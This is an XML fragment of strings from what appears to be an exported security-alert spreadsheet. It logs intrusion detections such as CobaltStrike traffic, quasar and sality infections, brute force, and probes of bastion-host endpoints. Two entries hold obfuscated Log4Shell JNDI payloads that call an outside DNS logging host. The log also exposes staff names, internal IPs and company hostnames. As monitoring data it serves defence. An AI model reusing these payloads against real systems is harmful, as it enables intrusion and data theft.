    <t>69a6330e02504307e6ba13d5</t>
  </si>
  <si>
    <t>55858</t>
  </si>
  <si>
    <t>69af69be444e5db4916d2adb</t>
  </si>
  <si>
    <t>69af628153b3105a30ff80da</t>
  </si>
  <si>
    <t>主机存在后渗透工具CobaltStrike相关云函数SSL/TLS访问</t>
  </si>
  <si>
    <t>192.168.6.19</t>
  </si>
  <si>
    <t>内部威胁&gt;渗透框架</t>
  </si>
  <si>
    <t>69af6032253558aa57e838bc</t>
  </si>
  <si>
    <t>39.107.213.66</t>
  </si>
  <si>
    <t>317771004</t>
  </si>
  <si>
    <t>内网ip范围</t>
  </si>
  <si>
    <t>53453</t>
  </si>
  <si>
    <t>ssl/tls</t>
  </si>
  <si>
    <t>主机存在感染木马远控家族swisyn</t>
  </si>
  <si>
    <t>69ae1c8502504307e6bb2412</t>
  </si>
  <si>
    <t>1hz.web.xx.t5mnn.com</t>
  </si>
  <si>
    <t>8eae3e050000</t>
  </si>
  <si>
    <t>60751</t>
  </si>
  <si>
    <t>69af32fa77ca4c920c51f12b</t>
  </si>
  <si>
    <t>69af27f54164fc338410f8b3</t>
  </si>
  <si>
    <t>69af26c84164fc338410f83f</t>
  </si>
  <si>
    <t>69af2503253558aa57e833c2</t>
  </si>
  <si>
    <t>2e3269c20000</t>
  </si>
  <si>
    <t>58381</t>
  </si>
  <si>
    <t>69af256477ca4c920c51ea0c</t>
  </si>
  <si>
    <t>主机存在感染黑客工具家族quasar</t>
  </si>
  <si>
    <t>内部威胁&gt;后门工具</t>
  </si>
  <si>
    <t>69af1c34e0683e0f8ca90e74</t>
  </si>
  <si>
    <t>8.148.24.233:4443</t>
  </si>
  <si>
    <t>8.148.24.233</t>
  </si>
  <si>
    <t>2e35a8380000</t>
  </si>
  <si>
    <t>0天0时0分0秒</t>
  </si>
  <si>
    <t>53187</t>
  </si>
  <si>
    <t>69af1a29b8cf5597ebb7db5e</t>
  </si>
  <si>
    <t>69aea058a0e97d17dfad8400</t>
  </si>
  <si>
    <t>222.92.117.175:9443/fort/network_SXF/add_net</t>
  </si>
  <si>
    <t>69ae9e2f53b3105a30ff71ea</t>
  </si>
  <si>
    <t>192.168.17.70</t>
  </si>
  <si>
    <t>69ae9960ac6ecec380001948</t>
  </si>
  <si>
    <t>61.184.9.237</t>
  </si>
  <si>
    <t>51428</t>
  </si>
  <si>
    <t>69ae98e744107df81565e31d</t>
  </si>
  <si>
    <t>69ae86c844107df81565e0d8</t>
  </si>
  <si>
    <t>69ae835da0e97d17dfad7f63</t>
  </si>
  <si>
    <t>112.224.141.67</t>
  </si>
  <si>
    <t>69ae836d7497cd0e21ad8111</t>
  </si>
  <si>
    <t>69ad2f72741d8d2486b802b9</t>
  </si>
  <si>
    <t>陈宗佳</t>
  </si>
  <si>
    <t>51094</t>
  </si>
  <si>
    <t>69ae4a80910349744ff1f9ed</t>
  </si>
  <si>
    <t>69ae7bfb10edc44512ab2396</t>
  </si>
  <si>
    <t>69ae7b68e4fad79a6e545a43</t>
  </si>
  <si>
    <t>tdyy.haiheangroup.com:9443/fort/cssp;help/v1/app/upload_file</t>
  </si>
  <si>
    <t>124.79.149.106</t>
  </si>
  <si>
    <t>69ae7a7f741d8d2486b82543</t>
  </si>
  <si>
    <t>69ae1b4d8ccf7e4eb1e38c42</t>
  </si>
  <si>
    <t>69ae79d49368d173c0d30d13</t>
  </si>
  <si>
    <t>tdyy.haiheangroup.com:9443/fort/system;help/netConfig/del_net</t>
  </si>
  <si>
    <t>223.160.230.85</t>
  </si>
  <si>
    <t>69ae6ec3a0e97d17dfad7c8c</t>
  </si>
  <si>
    <t>69ae6d2de4fad79a6e54583d</t>
  </si>
  <si>
    <t>221.238.2.150:8443/fort/trust/version/1.zip</t>
  </si>
  <si>
    <t>69ae65dd741d8d2486b8223d</t>
  </si>
  <si>
    <t>1.49.102.48</t>
  </si>
  <si>
    <t>69ae64ac0baeeb9910a6a0c7</t>
  </si>
  <si>
    <t>221.238.2.150:8443/fort/cssp;help/v1/app/upload_file</t>
  </si>
  <si>
    <t>61.169.6.180</t>
  </si>
  <si>
    <t>69ae26c8e6d3a88c5ae9d224</t>
  </si>
  <si>
    <t>www.beepool.com</t>
  </si>
  <si>
    <t>57638</t>
  </si>
  <si>
    <t>192.168.31.113</t>
  </si>
  <si>
    <t>69ae623ce0683e0f8ca8f357</t>
  </si>
  <si>
    <t>117.9.16.163</t>
  </si>
  <si>
    <t>15125</t>
  </si>
  <si>
    <t>26879</t>
  </si>
  <si>
    <t>69ae61a045595bae97af9102</t>
  </si>
  <si>
    <t>192.168.1.194</t>
  </si>
  <si>
    <t>69ae61987497cd0e21ad7c82</t>
  </si>
  <si>
    <t>69ae610144107df81565dace</t>
  </si>
  <si>
    <t>69ae5d34e4fad79a6e545635</t>
  </si>
  <si>
    <t>69ae5dbb77ca4c920c51b85b</t>
  </si>
  <si>
    <t>69ae5d110baeeb9910a69fd8</t>
  </si>
  <si>
    <t>69ae5cab0baeeb9910a69fc9</t>
  </si>
  <si>
    <t>69ae1f7f34c7f5b2cf43dd26</t>
  </si>
  <si>
    <t>69ae5623619e35f1f759233f</t>
  </si>
  <si>
    <t>tdyy.haiheangroup.com:9443/fort/system;help/netConfig/change_gate_way</t>
  </si>
  <si>
    <t>223.160.231.245</t>
  </si>
  <si>
    <t>主机存在SQL server数据库xp_dirtree外带数据攻击</t>
  </si>
  <si>
    <t>内部威胁&gt;异常操作</t>
  </si>
  <si>
    <t>69ae5203ac6ecec380000ab8</t>
  </si>
  <si>
    <t>E26030908428</t>
  </si>
  <si>
    <t>317125010</t>
  </si>
  <si>
    <t>37098</t>
  </si>
  <si>
    <t>69ae4c69619e35f1f7592239</t>
  </si>
  <si>
    <t>69ae45fa04b05750ff86b94b</t>
  </si>
  <si>
    <t>69ae42df04b05750ff86b8a2</t>
  </si>
  <si>
    <t>192.168.0.99</t>
  </si>
  <si>
    <t>69ae417710edc44512ab1c13</t>
  </si>
  <si>
    <t>69ae412d04b05750ff86b83c</t>
  </si>
  <si>
    <t>69ae410b741d8d2486b81dbb</t>
  </si>
  <si>
    <t>112.236.251.29</t>
  </si>
  <si>
    <t>69ae315510edc44512ab19ad</t>
  </si>
  <si>
    <t>tdyy.haiheangroup.com:9443/fort/resource;help/find_resource</t>
  </si>
  <si>
    <t>223.160.226.154</t>
  </si>
  <si>
    <t>192.168.17.185</t>
  </si>
  <si>
    <t>69ae382510edc44512ab1ac6</t>
  </si>
  <si>
    <t>69ae1be00baeeb9910a69645</t>
  </si>
  <si>
    <t>69ae330244107df81565d4c0</t>
  </si>
  <si>
    <t>69ae31a2619e35f1f7591e66</t>
  </si>
  <si>
    <t>222.92.117.175:9443/fort/cssp;help/v1/app/upload_file${jndi:dns://0${::-.}post${::-.}222${::-.}92${::-.}117${::-.}175${::-.}9443${::-.}fort${::-.}cssp;help${::-.}v1${::-.}app${::-.}upload_file${::-.}DYy${::-.}555${::-.}yrwjfs${::-.}ceye${::-.}io/ user}</t>
  </si>
  <si>
    <t>39.181.5.62</t>
  </si>
  <si>
    <t>69ae324a04b05750ff86b4de</t>
  </si>
  <si>
    <t>69ae324a77ca4c920c51b14a</t>
  </si>
  <si>
    <t>69ae31b82fb5a96697b67d91</t>
  </si>
  <si>
    <t>222.92.117.175:9443/fort/cssp;help/v1/app/upload_file</t>
  </si>
  <si>
    <t>69ae218a10edc44512ab172c</t>
  </si>
  <si>
    <t>tdyy.haiheangroup.com:9443/fort/system;help/netConfig/add_DNS</t>
  </si>
  <si>
    <t>69ae2f084cef246aae936a8f</t>
  </si>
  <si>
    <t>60.20.251.226</t>
  </si>
  <si>
    <t>69ae2f12f918f92f09e0bfd5</t>
  </si>
  <si>
    <t>69ae269ae6d3a88c5ae9d1c5</t>
  </si>
  <si>
    <t>62238</t>
  </si>
  <si>
    <t>69ae265b7aef01651bed970d</t>
  </si>
  <si>
    <t>ezil.me</t>
  </si>
  <si>
    <t>56949</t>
  </si>
  <si>
    <t>69ad2a0402504307e6bb0574</t>
  </si>
  <si>
    <t>69ae205c619e35f1f7591b3d</t>
  </si>
  <si>
    <t>69ae1fd48ccf7e4eb1e38d04</t>
  </si>
  <si>
    <t>69ae1f8c44107df81565d175</t>
  </si>
  <si>
    <t>69acd4317497cd0e21ad5747</t>
  </si>
  <si>
    <t>E26030803735</t>
  </si>
  <si>
    <t>贺红萍</t>
  </si>
  <si>
    <t>69ae1d4e741d8d2486b81807</t>
  </si>
  <si>
    <t>69ae1cea45595bae97af872f</t>
  </si>
  <si>
    <t>69ae1c96f918f92f09e0bce0</t>
  </si>
  <si>
    <t>69ae1c328ccf7e4eb1e38c69</t>
  </si>
  <si>
    <t>69ae1b8d0baeeb9910a69636</t>
  </si>
  <si>
    <t>69ae1956a396910f1b76656c</t>
  </si>
  <si>
    <t>69acbf697aef01651bed67f1</t>
  </si>
  <si>
    <t>E26030803122</t>
  </si>
  <si>
    <t>69ade17a77ca4c920c51a3b5</t>
  </si>
  <si>
    <t>69add6754164fc338410be69</t>
  </si>
  <si>
    <t>69add5484164fc338410bdec</t>
  </si>
  <si>
    <t>69add3e577ca4c920c519c79</t>
  </si>
  <si>
    <t>69adc8a8b8cf5597ebb78630</t>
  </si>
  <si>
    <t>69ac59fa8ccf7e4eb1e364c0</t>
  </si>
  <si>
    <t>上海园区MSS资产&gt;数据平台-计算存储节点2-emr</t>
  </si>
  <si>
    <t>69ad7e7002504307e6bb103b</t>
  </si>
  <si>
    <t>192.168.22.50/HNAP1</t>
  </si>
  <si>
    <t>47734</t>
  </si>
  <si>
    <t>E26030808132</t>
  </si>
  <si>
    <t>69ad80348ccf7e4eb1e37e3b</t>
  </si>
  <si>
    <t>oa.haiheangroup.com:8788/api/integration/workflowflow/getInterfaceRegisterCustomOperation</t>
  </si>
  <si>
    <t>69a44ace05d1089fbf2210de</t>
  </si>
  <si>
    <t>35608</t>
  </si>
  <si>
    <t>E26030111547</t>
  </si>
  <si>
    <t>69ad47a444107df81565be81</t>
  </si>
  <si>
    <t>69ad3dcb53b3105a30ff4d7a</t>
  </si>
  <si>
    <t>60.28.99.74:8443/fort/csspost/update</t>
  </si>
  <si>
    <t>139.196.73.164</t>
  </si>
  <si>
    <t>69a65409ac6ecec380fef3be</t>
  </si>
  <si>
    <t>64049</t>
  </si>
  <si>
    <t>69acf165219c4e580a9e4c2d</t>
  </si>
  <si>
    <t>www.hpool.com</t>
  </si>
  <si>
    <t>61986</t>
  </si>
  <si>
    <t>69ad253c44107df81565bb86</t>
  </si>
  <si>
    <t>60.28.99.74:8443/fort/csspost;help/update</t>
  </si>
  <si>
    <t>69ad23a67aef01651bed7463</t>
  </si>
  <si>
    <t>60.163.191.5</t>
  </si>
  <si>
    <t>15556</t>
  </si>
  <si>
    <t>192.168.20.64</t>
  </si>
  <si>
    <t>69ad2371b3104d3771509a3d</t>
  </si>
  <si>
    <t>16076</t>
  </si>
  <si>
    <t>69abdc9a741d8d2486b7e437</t>
  </si>
  <si>
    <t>61349</t>
  </si>
  <si>
    <t>69ad1a5753b3105a30ff4aa3</t>
  </si>
  <si>
    <t>192.168.17.121</t>
  </si>
  <si>
    <t>69ad077f05d1089fbf234396</t>
  </si>
  <si>
    <t>23.145.232.171:443</t>
  </si>
  <si>
    <t>23.145.232.171</t>
  </si>
  <si>
    <t>64635</t>
  </si>
  <si>
    <t>主机存在Linux上的Novell ZENworks Desktop Management TFTPD代码执行漏洞攻击</t>
  </si>
  <si>
    <t>内部威胁&gt;开源和商业应用漏洞</t>
  </si>
  <si>
    <t>69acf81fee465e849ec7f4a1</t>
  </si>
  <si>
    <t>27.29.226.7</t>
  </si>
  <si>
    <t>311040020</t>
  </si>
  <si>
    <t>31695</t>
  </si>
  <si>
    <t>69</t>
  </si>
  <si>
    <t>69acf76aa396910f1b764d52</t>
  </si>
  <si>
    <t>tdyy.haiheangroup.com:9443/fort/user;help/getLdap</t>
  </si>
  <si>
    <t>39.78.21.79</t>
  </si>
  <si>
    <t>69aba2c4e0683e0f8ca89721</t>
  </si>
  <si>
    <t>blog.ezil.me</t>
  </si>
  <si>
    <t>59503</t>
  </si>
  <si>
    <t>69acddb8910349744ff1d6a9</t>
  </si>
  <si>
    <t>主机存在SSH快速暴力破解</t>
  </si>
  <si>
    <t>69ac545aee465e849ec7e420</t>
  </si>
  <si>
    <t>49038</t>
  </si>
  <si>
    <t>E26030800523</t>
  </si>
  <si>
    <t>69ab8caf741d8d2486b7db7f</t>
  </si>
  <si>
    <t>69acd8d734c7f5b2cf43c083</t>
  </si>
  <si>
    <t>69acca6110edc44512aaf903</t>
  </si>
  <si>
    <t>192.168.0.156</t>
  </si>
  <si>
    <t>69acc8fca0e97d17dfad53de</t>
  </si>
  <si>
    <t>69ac8ff977ca4c920c51634b</t>
  </si>
  <si>
    <t>69ac84f44164fc33841083bb</t>
  </si>
  <si>
    <t>69ac83c84164fc3384108354</t>
  </si>
  <si>
    <t>69ac826577ca4c920c515c24</t>
  </si>
  <si>
    <t>69ac7728b8cf5597ebb73036</t>
  </si>
  <si>
    <t>69ac52bde0683e0f8ca8aca5</t>
  </si>
  <si>
    <t>172.16.6.13</t>
  </si>
  <si>
    <t>35340</t>
  </si>
  <si>
    <t>69abee1d9368d173c0d2d250</t>
  </si>
  <si>
    <t>222.92.117.175:9443/fort/system;help/SNMP/save_SNMP</t>
  </si>
  <si>
    <t>116.128.245.66</t>
  </si>
  <si>
    <t>69abd9a144107df815659f5f</t>
  </si>
  <si>
    <t>192.168.1.178</t>
  </si>
  <si>
    <t>69abd836ee465e849ec7d599</t>
  </si>
  <si>
    <t>47.96.74.149:88</t>
  </si>
  <si>
    <t>47.96.74.149</t>
  </si>
  <si>
    <t>2e36237e0000</t>
  </si>
  <si>
    <t>1068</t>
  </si>
  <si>
    <t>69aa891e741d8d2486b7c32d</t>
  </si>
  <si>
    <t>潘美辰</t>
  </si>
  <si>
    <t>50281</t>
  </si>
  <si>
    <t>69abd4ab53b3105a30ff30d3</t>
  </si>
  <si>
    <t>69abc32d44107df815659cd1</t>
  </si>
  <si>
    <t>60.28.99.74:8443/isomp-protocol/protocol/getCmd</t>
  </si>
  <si>
    <t>69aa686e7aef01651bed1ae3</t>
  </si>
  <si>
    <t>peicai.pandabtc.cn</t>
  </si>
  <si>
    <t>58942</t>
  </si>
  <si>
    <t>69ab8764e4fad79a6e5412eb</t>
  </si>
  <si>
    <t>221.7.69.70</t>
  </si>
  <si>
    <t>69ab801ba0e97d17dfad382f</t>
  </si>
  <si>
    <t>69ab611405d1089fbf231240</t>
  </si>
  <si>
    <t>150.138.251.104</t>
  </si>
  <si>
    <t>41387</t>
  </si>
  <si>
    <t>69a2299fac6ecec380fe5b99</t>
  </si>
  <si>
    <t>50144</t>
  </si>
  <si>
    <t>69ab3e7b77ca4c920c512ea6</t>
  </si>
  <si>
    <t>69ab33754164fc3384104635</t>
  </si>
  <si>
    <t>69ab32484164fc33841045d1</t>
  </si>
  <si>
    <t>69ab30e577ca4c920c512830</t>
  </si>
  <si>
    <t>主机存在Oracle快速暴力破解攻击</t>
  </si>
  <si>
    <t>69ab2c37219c4e580a9e1a2e</t>
  </si>
  <si>
    <t>317820026</t>
  </si>
  <si>
    <t>武汉园区&gt;数据库服务器主</t>
  </si>
  <si>
    <t>57295</t>
  </si>
  <si>
    <t>oracle</t>
  </si>
  <si>
    <t>69ab25a8b8cf5597ebb6e05a</t>
  </si>
  <si>
    <t>69ab151953b3105a30ff1ffe</t>
  </si>
  <si>
    <t>221.238.2.150:8443/fort/outServices/save_authentication</t>
  </si>
  <si>
    <t>69ab03df53b3105a30ff1e84</t>
  </si>
  <si>
    <t>221.238.2.150:8443/cssp/v1/app/download_backup</t>
  </si>
  <si>
    <t>69aadf4c2fb5a96697b632ae</t>
  </si>
  <si>
    <t>114.84.118.207</t>
  </si>
  <si>
    <t>69aac3d3a0e97d17dfad2846</t>
  </si>
  <si>
    <t>69aab70f53b3105a30ff1889</t>
  </si>
  <si>
    <t>221.238.2.150:8443/fort/csspost/update</t>
  </si>
  <si>
    <t>69aab1d34cef246aae931bd3</t>
  </si>
  <si>
    <t>47.104.248.7</t>
  </si>
  <si>
    <t>69aa9fdd44107df815658254</t>
  </si>
  <si>
    <t>0天0时0分47秒</t>
  </si>
  <si>
    <t>69aa97e2619e35f1f758cbaa</t>
  </si>
  <si>
    <t>183.6.120.160</t>
  </si>
  <si>
    <t>69aa9636619e35f1f758cb71</t>
  </si>
  <si>
    <t>69aa95e70baeeb9910a64bcd</t>
  </si>
  <si>
    <t>69aa49d5910349744ff1998d</t>
  </si>
  <si>
    <t>赵淑锋</t>
  </si>
  <si>
    <t>69aa8e9c53b3105a30ff1477</t>
  </si>
  <si>
    <t>171.221.206.175:9995/fort/user;help/getLdap</t>
  </si>
  <si>
    <t>118.250.129.164</t>
  </si>
  <si>
    <t>69aa8d87a396910f1b7615f7</t>
  </si>
  <si>
    <t>69aa8d01a396910f1b7615e4</t>
  </si>
  <si>
    <t>69aa8adb53b3105a30ff1410</t>
  </si>
  <si>
    <t>223.104.87.206</t>
  </si>
  <si>
    <t>192.168.0.244</t>
  </si>
  <si>
    <t>69aa889e02504307e6bab200</t>
  </si>
  <si>
    <t>124.134.22.152</t>
  </si>
  <si>
    <t>51239</t>
  </si>
  <si>
    <t>22470</t>
  </si>
  <si>
    <t>69a93735741d8d2486b79f3c</t>
  </si>
  <si>
    <t>51690</t>
  </si>
  <si>
    <t>69aa88ab44107df815658000</t>
  </si>
  <si>
    <t>192.168.10.19</t>
  </si>
  <si>
    <t>69aa88aa4cef246aae931798</t>
  </si>
  <si>
    <t>192.168.0.3</t>
  </si>
  <si>
    <t>69aa879b05d1089fbf22f3f7</t>
  </si>
  <si>
    <t>49900</t>
  </si>
  <si>
    <t>69aa870a44107df815657fc7</t>
  </si>
  <si>
    <t>69aa8626a396910f1b761517</t>
  </si>
  <si>
    <t>180.113.12.242</t>
  </si>
  <si>
    <t>69aa86310baeeb9910a64a02</t>
  </si>
  <si>
    <t>69aa847f741d8d2486b7c29f</t>
  </si>
  <si>
    <t>69aa8316f918f92f09e06ffe</t>
  </si>
  <si>
    <t>69aa7e7ea0e97d17dfad2116</t>
  </si>
  <si>
    <t>219.147.9.110:8443/API/system/command-run</t>
  </si>
  <si>
    <t>180.138.247.201</t>
  </si>
  <si>
    <t>69aa7add34c7f5b2cf438bd4</t>
  </si>
  <si>
    <t>221.238.2.150:8443/fort/system;help/netConfig/change_net</t>
  </si>
  <si>
    <t>49.93.193.143</t>
  </si>
  <si>
    <t>69aa710044107df815657cfd</t>
  </si>
  <si>
    <t>69aa6d3f444e5db4916cb60d</t>
  </si>
  <si>
    <t>221.238.2.150:8443/fort/system;help/netConfig/add_DNS</t>
  </si>
  <si>
    <t>223.104.161.226</t>
  </si>
  <si>
    <t>69a4e852e0683e0f8ca79f9a</t>
  </si>
  <si>
    <t>63189</t>
  </si>
  <si>
    <t>69aa64f1444e5db4916cb535</t>
  </si>
  <si>
    <t>222.128.62.127</t>
  </si>
  <si>
    <t>69aa63fca0e97d17dfad1dfd</t>
  </si>
  <si>
    <t>69aa62af8ccf7e4eb1e336ee</t>
  </si>
  <si>
    <t>192.168.1.149</t>
  </si>
  <si>
    <t>69aa6271ee465e849ec7a056</t>
  </si>
  <si>
    <t>57113</t>
  </si>
  <si>
    <t>69a98d74e4fad79a6e53e2b2</t>
  </si>
  <si>
    <t>117.151.77.82</t>
  </si>
  <si>
    <t>69aa5735a0e97d17dfad1cae</t>
  </si>
  <si>
    <t>221.238.2.150:8443/isomp-protocol/protocol/getHis</t>
  </si>
  <si>
    <t>69a929b010edc44512aaa3a5</t>
  </si>
  <si>
    <t>69aa4ee47497cd0e21ad1e41</t>
  </si>
  <si>
    <t>222.209.84.10</t>
  </si>
  <si>
    <t>69aa4b3e910349744ff199bd</t>
  </si>
  <si>
    <t>69aa4ab7619e35f1f758c292</t>
  </si>
  <si>
    <t>27.36.145.3</t>
  </si>
  <si>
    <t>69aa499b7aef01651bed1443</t>
  </si>
  <si>
    <t>zh-snipaste.com</t>
  </si>
  <si>
    <t>64843</t>
  </si>
  <si>
    <t>69aa477eb3f2e004b99b14db</t>
  </si>
  <si>
    <t>69a93c89a396910f1b75f31f</t>
  </si>
  <si>
    <t>69aa451ee4fad79a6e53f428</t>
  </si>
  <si>
    <t>69aa3be744107df815657645</t>
  </si>
  <si>
    <t>69aa3802b3f2e004b99b12a3</t>
  </si>
  <si>
    <t>14.145.205.80</t>
  </si>
  <si>
    <t>69aa31cc9368d173c0d2a700</t>
  </si>
  <si>
    <t>124.127.6.8</t>
  </si>
  <si>
    <t>69aa2d10741d8d2486b7b73e</t>
  </si>
  <si>
    <t>69aa2ba434c7f5b2cf4381de</t>
  </si>
  <si>
    <t>69aa289f4cef246aae930b5c</t>
  </si>
  <si>
    <t>69aa245af918f92f09e06426</t>
  </si>
  <si>
    <t>69aa10ca7aef01651bed0822</t>
  </si>
  <si>
    <t>192.168.0.184</t>
  </si>
  <si>
    <t>69aa04fb219c4e580a9de634</t>
  </si>
  <si>
    <t>139.135.42.8</t>
  </si>
  <si>
    <t>33150</t>
  </si>
  <si>
    <t>15000</t>
  </si>
  <si>
    <t>69a9ecf977ca4c920c50f83e</t>
  </si>
  <si>
    <t>69a9e1f54164fc3384100790</t>
  </si>
  <si>
    <t>69a9e0c84164fc3384100724</t>
  </si>
  <si>
    <t>69a9df6577ca4c920c50f1a0</t>
  </si>
  <si>
    <t>69a9d428b8cf5597ebb69355</t>
  </si>
  <si>
    <t>69a9a9f202504307e6ba9092</t>
  </si>
  <si>
    <t>66.167.169.153</t>
  </si>
  <si>
    <t>21684</t>
  </si>
  <si>
    <t>69a9a44f0baeeb9910a63270</t>
  </si>
  <si>
    <t>117.136.90.82</t>
  </si>
  <si>
    <t>69a99e5d219c4e580a9ddda0</t>
  </si>
  <si>
    <t>110.37.82.5</t>
  </si>
  <si>
    <t>12963</t>
  </si>
  <si>
    <t>69a95e59b3f2e004b99afdfb</t>
  </si>
  <si>
    <t>125.38.164.188</t>
  </si>
  <si>
    <t>69a956d9ac6ecec380ff5ef4</t>
  </si>
  <si>
    <t>180.76.76.76</t>
  </si>
  <si>
    <t>47928</t>
  </si>
  <si>
    <t>69a94c80e4fad79a6e53dca5</t>
  </si>
  <si>
    <t>222.92.117.175:9443/fort/system;help/netConfig/del_route</t>
  </si>
  <si>
    <t>69a948fc53b3105a30fef483</t>
  </si>
  <si>
    <t>69a93da08ccf7e4eb1e31936</t>
  </si>
  <si>
    <t>221.238.2.150:8443/fort/system;help/netConfig/del_route</t>
  </si>
  <si>
    <t>120.41.152.211</t>
  </si>
  <si>
    <t>69a943898ccf7e4eb1e319f1</t>
  </si>
  <si>
    <t>adm.vendingsh.com/prod-api/login</t>
  </si>
  <si>
    <t>121.5.207.147</t>
  </si>
  <si>
    <t>69a93fdb05d1089fbf22c20d</t>
  </si>
  <si>
    <t>110.37.103.207</t>
  </si>
  <si>
    <t>51566</t>
  </si>
  <si>
    <t>69a93db58ccf7e4eb1e31937</t>
  </si>
  <si>
    <t>120.41.152.49</t>
  </si>
  <si>
    <t>69a9389244107df815655d3c</t>
  </si>
  <si>
    <t>69a931d253b3105a30fef168</t>
  </si>
  <si>
    <t>69a933e9f918f92f09e04e05</t>
  </si>
  <si>
    <t>69a7e3a5741d8d2486b77b48</t>
  </si>
  <si>
    <t>53193</t>
  </si>
  <si>
    <t>69a9206b910349744ff17a82</t>
  </si>
  <si>
    <t>60.28.99.74:8443/fort/system;help/netConfig/del_route</t>
  </si>
  <si>
    <t>36.21.107.23</t>
  </si>
  <si>
    <t>69a9178c44107df8156558ce</t>
  </si>
  <si>
    <t>69a91e0dac6ecec380ff53eb</t>
  </si>
  <si>
    <t>青岛园区&gt;青岛超融合物理服务器地址</t>
  </si>
  <si>
    <t>52572</t>
  </si>
  <si>
    <t>69a8f6da8ccf7e4eb1e30fc6</t>
  </si>
  <si>
    <t>69a7f0b810edc44512aa83f0</t>
  </si>
  <si>
    <t>69a9198853b3105a30feee2b</t>
  </si>
  <si>
    <t>69a9187234c7f5b2cf4366bb</t>
  </si>
  <si>
    <t>69a91685a0e97d17dfacfb0b</t>
  </si>
  <si>
    <t>69a9168310edc44512aaa118</t>
  </si>
  <si>
    <t>192.168.20.132</t>
  </si>
  <si>
    <t>69a904517aef01651bece4b5</t>
  </si>
  <si>
    <t>28773</t>
  </si>
  <si>
    <t>69a8f39e53b3105a30fee93b</t>
  </si>
  <si>
    <t>徐孟奇</t>
  </si>
  <si>
    <t>69a8ff6d7497cd0e21acfb75</t>
  </si>
  <si>
    <t>69a8f71e741d8d2486b79697</t>
  </si>
  <si>
    <t>192.168.20.210</t>
  </si>
  <si>
    <t>69a8f296219c4e580a9dbfcb</t>
  </si>
  <si>
    <t>42062</t>
  </si>
  <si>
    <t>69a8e794a396910f1b75e7a0</t>
  </si>
  <si>
    <t>69a8dbc5444e5db4916c8a98</t>
  </si>
  <si>
    <t>69a8d85f619e35f1f75899cc</t>
  </si>
  <si>
    <t>171.221.206.175:9995/fort/system;help/netConfig/del_route</t>
  </si>
  <si>
    <t>60.164.210.44</t>
  </si>
  <si>
    <t>69a8da1ba396910f1b75e5a5</t>
  </si>
  <si>
    <t>69a8d98f741d8d2486b79235</t>
  </si>
  <si>
    <t>69a8d8970baeeb9910a61abb</t>
  </si>
  <si>
    <t>69a8d85e8ccf7e4eb1e30b1f</t>
  </si>
  <si>
    <t>69a8d7d4f918f92f09e0410c</t>
  </si>
  <si>
    <t>69a8b66c600970edcdf05014</t>
  </si>
  <si>
    <t>14.1.104.57:15000</t>
  </si>
  <si>
    <t>14.1.104.57</t>
  </si>
  <si>
    <t>10165</t>
  </si>
  <si>
    <t>69a8b415e6d3a88c5ae5d25f</t>
  </si>
  <si>
    <t>10088</t>
  </si>
  <si>
    <t>69a89b7b77ca4c920c50c4e9</t>
  </si>
  <si>
    <t>69a890744164fc33840fcb45</t>
  </si>
  <si>
    <t>69a88f484164fc33840fcad6</t>
  </si>
  <si>
    <t>69a88de577ca4c920c50bdbc</t>
  </si>
  <si>
    <t>69a882a9b8cf5597ebb6455a</t>
  </si>
  <si>
    <t>69a87ee0b8cf5597ebb643fc</t>
  </si>
  <si>
    <t>69a87ee04164fc33840fc379</t>
  </si>
  <si>
    <t>69a87bc64164fc33840fc30b</t>
  </si>
  <si>
    <t>69a87a104cef246aae92df8c</t>
  </si>
  <si>
    <t>182.242.184.193</t>
  </si>
  <si>
    <t>69a865758ccf7e4eb1e3013f</t>
  </si>
  <si>
    <t>192.168.17.212</t>
  </si>
  <si>
    <t>69a81a75444e5db4916c7a27</t>
  </si>
  <si>
    <t>69a8029cb3f2e004b99ad971</t>
  </si>
  <si>
    <t>69a800e2741d8d2486b77f11</t>
  </si>
  <si>
    <t>14.19.80.181</t>
  </si>
  <si>
    <t>69a7f88a44107df815653c68</t>
  </si>
  <si>
    <t>69a7f10a0baeeb9910a6072f</t>
  </si>
  <si>
    <t>E26030308879</t>
  </si>
  <si>
    <t>69a7e459a396910f1b75cf0a</t>
  </si>
  <si>
    <t>221.238.2.150:8443/fort/system/auth/upload_zip;login</t>
  </si>
  <si>
    <t>58.212.114.79</t>
  </si>
  <si>
    <t>69a7ed61219c4e580a9da1af</t>
  </si>
  <si>
    <t>10403</t>
  </si>
  <si>
    <t>69a7e7ba44107df815653a24</t>
  </si>
  <si>
    <t>69a7e90d619e35f1f75884bc</t>
  </si>
  <si>
    <t>69a7e88c2fb5a96697b5e53a</t>
  </si>
  <si>
    <t>112.224.162.54</t>
  </si>
  <si>
    <t>69a7e5e7444e5db4916c74a9</t>
  </si>
  <si>
    <t>182.118.238.138</t>
  </si>
  <si>
    <t>69a7de3e44107df8156538ef</t>
  </si>
  <si>
    <t>69a69107741d8d2486b7595c</t>
  </si>
  <si>
    <t>56305</t>
  </si>
  <si>
    <t>69a7de0f9368d173c0d26b7c</t>
  </si>
  <si>
    <t>222.92.117.175:9443/fort/system;help/netConfig/del_net</t>
  </si>
  <si>
    <t>111.18.37.234</t>
  </si>
  <si>
    <t>69a7b00b910349744ff15326</t>
  </si>
  <si>
    <t>69a7da2153b3105a30feceee</t>
  </si>
  <si>
    <t>69a7d3f6619e35f1f75881ea</t>
  </si>
  <si>
    <t>222.92.117.175:9443/fort/system;help/netConfig/del_route${jndi:dns://0${::-.}post${::-.}222${::-.}92${::-.}117${::-.}175${::-.}9443${::-.}fort${::-.}system;help${::-.}netConfig${::-.}del_rou${::-.}q4I${::-.}555${::-.}yrwjfs${::-.}ceye${::-.}io/ user}</t>
  </si>
  <si>
    <t>69a6877310edc44512aa5e1b</t>
  </si>
  <si>
    <t>69a7cdf34cef246aae92ce87</t>
  </si>
  <si>
    <t>221.238.2.150:8443/AGV/AgvBanYunHandler.ashx</t>
  </si>
  <si>
    <t>183.137.41.19</t>
  </si>
  <si>
    <t>69a78b8853b3105a30fec3dc</t>
  </si>
  <si>
    <t>69a7cc327497cd0e21acdb8d</t>
  </si>
  <si>
    <t>69a7cc2d10edc44512aa7eaf</t>
  </si>
  <si>
    <t>主机存在感染感染型病毒家族sality</t>
  </si>
  <si>
    <t>内部威胁&gt;感染型病毒</t>
  </si>
  <si>
    <t>69a7bc53e6d3a88c5ae54ec4</t>
  </si>
  <si>
    <t>185.149.91.65:15000</t>
  </si>
  <si>
    <t>185.149.91.65</t>
  </si>
  <si>
    <t>2e326a7c0000</t>
  </si>
  <si>
    <t>22280</t>
  </si>
  <si>
    <t>69a7ba5b253558aa57e72c3d</t>
  </si>
  <si>
    <t>37719</t>
  </si>
  <si>
    <t>69a7b46a0baeeb9910a5ff4f</t>
  </si>
  <si>
